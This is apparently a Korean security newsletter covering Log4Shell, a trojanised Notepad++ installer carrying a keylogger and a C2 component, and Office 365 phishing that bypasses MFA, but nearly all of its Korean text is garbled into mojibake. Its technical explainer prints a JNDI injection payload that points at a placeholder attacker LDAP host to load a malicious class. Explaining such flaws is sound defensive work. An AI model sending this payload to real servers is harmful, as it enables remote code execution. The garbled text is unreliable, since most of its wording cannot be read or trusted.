์๋
ํ์ธ์! ๋ค์์ฃผ๊ฐ ๋ฒ์จ ํฌ๋ฆฌ์ค๋ง์ค์์. ๐ ์ ํฌ ํดํน์งน์งน์ ๋ค์ ์ฃผ ์์์ผ(20์ผ) ์ฃผ๊ฐ๋ด์ค ์ดํ์ ํด์์ ๊ฐ์ง 12์ 3์ฃผ์ฐจ ํดํน์งน์งน ๋ด์ค๋ ํฐ ๐ ์๋
ํ์ธ์! ๋ค์์ฃผ๊ฐ ๋ฒ์จ ํฌ๋ฆฌ์ค๋ง์ค์์. ๐ ์ ํฌ ํดํน์งน์งน์ ๋ค์ ์ฃผ ์์์ผ(20์ผ) ์ฃผ๊ฐ๋ด์ค ์ดํ์ 2์ฃผ๊ฐ ํด์์ ๊ฐ์ง๋ฉฐ ๋ด๋
๊ณํ์ ์ธ์ธ ์๊ฐ์
๋๋ค! 1์ ์ฒซ์งธ์ฃผ์ ๋ค์ ์ฐพ์์ฌ๊ฒ์. ๐ฅบ ์ฌํด์ ๋ง์ง๋ง ํดํน ์๋ ค์ค๊ฒ๋ SQL Injection์
๋๋ค. ๊ทธ๋ฆฌ๊ณ ์ง๋ ํดํน ์๋ ค์ค๊ฒ์ธ OTP์์ ์จ๋ฆฌ์ค์ ๋ฐฅ์ด ๋ฑ์ฅํ๋๋ฐ, ์ด๋ฒ ํด์ปค์ TMI๋ ์จ๋ฆฌ์ค์ ๋ฐฅ, ์ด ์น๊ตฌ๋ค์ ๋ํด์ ์๊ธฐํด๋ณด๋ ์๊ฐ์ ๊ฐ์ ธ๋ณด๋๋ก ํ ๊ฒ์. ๊ธฐ๋ํด์ฃผ์ธ์! ๐ ์ฃผ๊ฐ๋ด์ค ์ง๋ ์ฃผ์๋ ์ด๋ค ์ผ๋ค์ด ์์์๊น? ๐ log4j๋ Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter ๋ฐ Minecraft์ ๊ฐ์ ๋น๋์ค ๊ฒ์์ ๋น๋กฏํ ์ฌ๋ฌ ์
์ฒด์์ ๋๋ฆฌ ์ฌ์ฉ๋๋ฉฐ, ์ค๋ฅ ๋ฉ์์ง ๋ฑ์ ๊ธฐ๋กํ๊ธฐ ์ํด ์๋ฐฑ๋ง ๊ฐ์ Java ์์ฉ ํ๋ก๊ทธ๋จ์์ ์ฌ์ฉํ๋ ๋ก๊น
๋ผ์ด๋ธ๋ฌ๋ฆฌ์
๋๋ค.
Log4j 2.0-beta9 ๋ฒ์ 2.14๊น์ง ์ํฅ์ ๋ฏธ์น๋ ๋ชจ๋ ์ ํ๋ฆฌ์ผ์ด์
์์ ์๊ฒฉ ์ฝ๋ ์คํ ์ทจ์ฝ์ (Log4Shell, CVE-2021-44228)์ด ๋ฐ๊ฒฌ๋์ด ์ ์ธ๊ณ ๋ณด์ ์
๊ณ๊ฐ ๊ธํ๊ฒ ์กฐ์น๋ฅผ ์ทจํ๊ณ ์์ด์. Minecraft์์ ๊ฐ๋จํ ๋ฉ์์ง๋ฅผ ์ฑํ
์ผ๋ก ์น๊ธฐ๋ง ํ๋ฉด ์๋ฒ์์ ์๊ฒฉ ์ฝ๋๋ฅผ ์คํํ ์ ์๋ค๊ณ ํ๋ค์. ๐ฆ
๋ฐ๊ฒฌ๋ ์ทจ์ฝ์ ์ Log4j 2์ JNDI(Java Naming and Directory Interface) ์ธ์ ์
์ทจ์ฝ์ ์ผ๋ก, ์์ธํ ์ ๋ณด๋ ์๋์ ํ๋ฃจํ์ค์ ์ฐธ๊ณ ํด์ฃผ์ธ์! Notepad++๋ ์๋์ฐ์ฉ ์ธ๊ธฐ ์๋ ๋ฌด๋ฃ ํ
์คํธ ๋ฐ ์์ค์ฝ๋ ํธ์ง๊ธฐ๋ก, StrongPity ํดํน ๊ทธ๋ฃน์ด ํค๋ก๊ฑฐ ์
์ฑ์ฝ๋๊ฐ ํฌํจ๋ ์
์ฑ Notepad++ ์ค์น ํ๋ก๊ทธ๋จ์ ๋ฐฐํฌํ๊ณ ์์ต๋๋ค.
ํด๋น ํ๋ก๊ทธ๋จ์ ์คํํ ๊ฒฝ์ฐ, Notepad++๋ ์ ์์ ์ผ๋ก ์ค์น๋์ด ํผํด์๋ ์
์ฑ์ฝ๋๊ฐ ์จ์ด์๋ค๊ณ ์๊ฐํ๊ธฐ ํ๋ค์ด์. ํ์ง๋ง, ์ถ๊ฐ๋ก ntuis32.exe๊ณผ winpickr.exe๋ ์ค์น๋ฉ๋๋ค. ๐คจ
ntuis32.exe๋ ์
์ฑ ํค๋ก๊ฑฐ๋ก ์ฌ์ฉ์์ ๋ชจ๋ ํค ์
๋ ฅ์ ์ ์ฅํ๊ณ ์์คํ
์์ ํ์ผ ๋ฐ ๊ธฐํ ๋ฐ์ดํฐ๋ฅผ ํ์น ์ ์์ผ๋ฉฐ, winpickr.exe๋ C2 ์ฐ๊ฒฐ์ ์ค์ ํ์ฌ ํ์น ๋ฐ์ดํฐ๋ฅผ ํด์ปค์๊ฒ ์ ์กํ๋ค๊ณ ํด์. ๐ ๋ฏธ๊ตญ์ ๋ํ ๋ก๊ทธ์ธ ํฌํธ์ ์ฌ์นญํ์ฌ Office 365 ๊ณ์ ์ ํ์น๋๋ก ์ค๊ณ๋ ์ฌ๋ฌ ํผ์ฑ ๊ณต๊ฒฉ์ด ๋๋ฌ๋ฌ์ต๋๋ค.
ํผ์ฑ ๊ณต๊ฒฉ์ ์๋ก์ด ์ค๋ฏธํฌ๋ก ๋ณ์ข
, COVID-19 ํ
์คํธ ๊ฒฐ๊ณผ, ์ถ๊ฐ ํ
์คํธ ์๊ตฌ ์ฌํญ ๋๋ ํด๋์ค ๋ณ๊ฒฝ์ ๋ํ ์ ๋ณด๋ฅผ ์ ๋ชฉ์ผ๋ก ์ฒจ๋ถ๋ htmํ์ผ์ ํด๋ฆญํ๋๋ก ํฉ๋๋ค. ๊ทธ๋ฌ๋ฉด ํด์ปค๊ฐ ๋ง๋ ํด๋น ๋ํ์ ๋ก๊ทธ์ธ ํฌํธ ํ์ด์ง๋ก ์ด๋ํ๋ ๊ฑฐ์ฃ . ์ฌ์ง์ด MFA(Multi-Factor Authentication)๋ฅผ ์ฐํํ๊ธฐ ์ํ์ฌ ํผํด์์ ํด๋์ ํ์ ์ ์ก๋ OTP๋ฅผ ์
๋ ฅํ๋๋ก ํด ๊ณ์ ์ ํ์ทจํ๋ค๊ณ ํด์.
Office 365์ ๊ณ์ ์ด ํ์ทจ๋นํ๋ฉด ์ ์ ๋ฉ์ผ ๊ณ์ ์ ์ก์ธ์คํ๊ณ ๋ค๋ฅธ ์ฌ์ฉ์์๊ฒ ๋ฉ์์ง๋ฅผ ๋ณด๋ผ ๋ฟ ์๋๋ผ OneDrive ๋ฐ SharePoint์ ์ ์ฅ๋ ์ ๋ณด์๋ ์ก์ธ์คํ ์ ์๊ธฐ ๋๋ฌธ์ ๋์ฑ ์กฐ์ฌํด์ผ๊ฒ ๋ค์. ๐ฅบ ํดํค๋ณด์ด์ฆํ์ด ์ฐ๊ตฌํ๊ณ ๋ถ์ํ๋ ์ต์ ํดํน ๊ธฐ์ ๐ [๋์] Apache Log4j 2.x <= 2.15.0-rc1 [์ค๋ช
] log4j๋ ์ ์ธ๊ณ์ ์ผ๋ก ์ธ๊ธฐ์๋ logging library๋ก Mincraft, Apple iCloud, Apache, Twitter, Steam, Amazon, Tesla ๋ฑ ํ์ฌ ์๋ง์ ์ํํธ์จ์ด์์ ์ฌ์ฉ๋๊ณ ์์ต๋๋ค. ์ด๋ฌํ log4j์์ ์๊ฒฉ ์ฝ๋ ์คํ์ด ๊ฐ๋ฅํ JNDI Injection ์ทจ์ฝ์ ์ด ๋ฐ๊ฒฌ๋์์ต๋๋ค. ํด๋น ์ทจ์ฝ์ ์ ์ด๋ฆ์ log4shell๋ก ๋ช
๋ช
๋์์ผ๋ฉฐ log4j๋ฅผ ์ฌ์ฉํ๋ ์ํํธ์จ์ด ๋๋ถ๋ถ์ ๊ณต๊ฒฉ ๊ฐ๋ฅํ ๋์ ํ๊ธ๋ ฅ๊ณผ ๋น๊ต์ ๊ฐ๋จํ๋ค๋ ์ ๋๋ฌธ์ ์ทจ์ฝ์ ์ ์ํ์ฑ์ ํ๊ฐํ๋ ์งํ์ธ cvss ์ ์์ ์ต๊ณ ์ 10.0์ด ๋ถ์ฌ๋์์ต๋๋ค. log4shell ์ทจ์ฝ์ ์ ์ํฅ์ ๋ฐ๋ ์ํํธ์จ์ด๋ ๋งํฌ์์ ํ์ธํ ์ ์์ผ๋ฉฐ, 2021/12/12 ๊ธฐ์ค ์ง์์ ์ผ๋ก ์
๋ฐ์ดํธ๋๊ณ ์์ต๋๋ค. ์ทจ์ฝ์ ์ JndiManager.java ์ JNDI lookup ๊ธฐ๋ฅ์์ ๋ฐ๊ฒฌ๋์์ต๋๋ค. JNDI(Java Naming and Directory Interface)๋ ์๋ฐ ์ ํ๋ฆฌ์ผ์ด์
์์ ์ธ๋ถ ๋๋ ํฐ๋ฆฌ ์๋น์ค์ ์ ๊ทผํ๊ธฐ ์ํ API๋ก, ์๊ฒฉ์ง ์๋ฒ์ ๊ฐ์ฒด๋ฅผ ๋ฐ์ธ๋ฉํด ์ ํ๋ฆฌ์ผ์ด์
์์ ์ ๊ทผํ ์ ์๋ ๊ธฐ๋ฅ์
๋๋ค. ์ด๋ฌํ ์ธ๋ถ ๋๋ ํฐ๋ฆฌ ์๋น์ค ํ๋กํ ์ฝ์ ๋ํ์ ์ผ๋ก LDAP(Lightweight Directory Access Protocol)๊ณผ LDAPS(Secure LDAP)์ด ์์ต๋๋ค. ํด๋น lookup ๊ธฐ๋ฅ์ name ๋งค๊ฐ๋ณ์์ ${jndi:ldap://[attacker site]/malicious_class} ์ ๊ฐ์ด ํด์ปค๊ฐ ์ ์ดํ๋ ์๋ฒ์ ์
์ฑ ํด๋์ค ๊ฒฝ๋ก๋ฅผ ์ ๋ฌํ๊ฒ ๋๋ฉด lookup์ ${} ์์ ๋ด์ฉ์ ํ์ฑํด ์คํํฉ๋๋ค. ์ด๋ JNDI:LDAP ํ๋กํ ์ฝ๋ก ์ ๊ทผํ๋ ์ธ๋ถ ๋๋ ํฐ๋ฆฌ ์๋น์ค์ ๋ํ ๊ฒ์ฆ์ด ์กด์ฌํ์ง ์์ ํด์ปค์ ์
์ฑ ํด๋์ค๋ฅผ ๋ฐ์ธ๋ฉํ๊ฒ ๋๊ณ ์
์ฑ ํด๋์ค์ ํฌํจ๋ ์์ ์ฝ๋๋ฅผ ์๊ฒฉ์์ ์คํํ ์ ์์ต๋๋ค.
์์ ๊ฐ์ด ์ทจ์ฝํ ์๋ฒ๊ฐ log4j๋ฅผ ํตํด request์ ๊ฐ์ user input์ ๊ธฐ๋กํ๋ ๊ฒฝ์ฐ ์๊ฒฉ ์ฝ๋ ์คํ์ด ํธ๋ฆฌ๊ฑฐ ๋ฉ๋๋ค. JNDI์ JNDI Injection์ [ํ๋ฃจํ์ค] CVE-2021-2109 : ์ค๋ผํด Weblogic Server ์๊ฒฉ ์ฝ๋ ์คํ ์ทจ์ฝ์ ์์๋ ํ์ฉ๋์์ต๋๋ค. ํจ์น๋ log์ ๋งค๊ฐ๋ณ์ name์ ์ ๋ฌ๋๋ ํ๋กํ ์ฝ ๋ฐ ldap ์๋ฒ, ํด๋์ค์ ๋ํ ํํฐ๋ฅผ ์ถ๊ฐํ๋ ์ฝ๋๋ฅผ ์ถ๊ฐํ๋ ๊ฒ์ผ๋ก ์ด๋ฃจ์ด์ก์ต๋๋ค. ์ง์ํด์ ๋ ์ข์ ๋ด์ค๋ ํฐ๋ฅผ ์ ๊ณตํ๊ธฐ ์ํ ๊ฒ์ผ๋ก ๊ธ์ ์ ์ผ๋ก ์๊ฐํด์ฃผ์๋ฉด ๊ฐ์ฌํ๊ฒ ์ต๋๋ค! ์นด์นด์ค๋ฑ
ํฌ 3333-21-5085994 ใ
ใ
ใ
์ค๋ ์ ํด๋๋ฆฐ ๋ด์ฉ์ด ๋ง์์ ๋์
จ๋์? ์ฃผ์ ์น๊ตฌ๋ค์๊ฒ ๋ด์ค๋ ํฐ๋ฅผ ์ถ์ฒํด์ฃผ์ธ์! ๋ค์์ฃผ์๋ ์์ฐฌ ๋ด์ฉ์ผ๋ก ๋์์ค๊ฒ ์ต๋๋ค. ๐ ํน์ ๋ง์์ ์๋๋ ๋ถ๋ถ์ด ์์๋์? ์ฌ๊ธฐ์์ ํผ๋๋ฐฑ์ ์ ๋ฌํด์ฃผ์ธ์! ์ฌ๋ฌ๋ถ์ ์๊ฒฌ๋ค์ ์ ๊ทน ๋ฐ์ํด์ ๋์ฑ ์ ์ตํ ๋ด์ค๋ ํฐ๋ฅผ ๋ง๋ค์ด๊ฐ๋๋ก ํ๊ฒ ์ต๋๋ค. ๐ ํดํค๋ณด์ด์ฆ |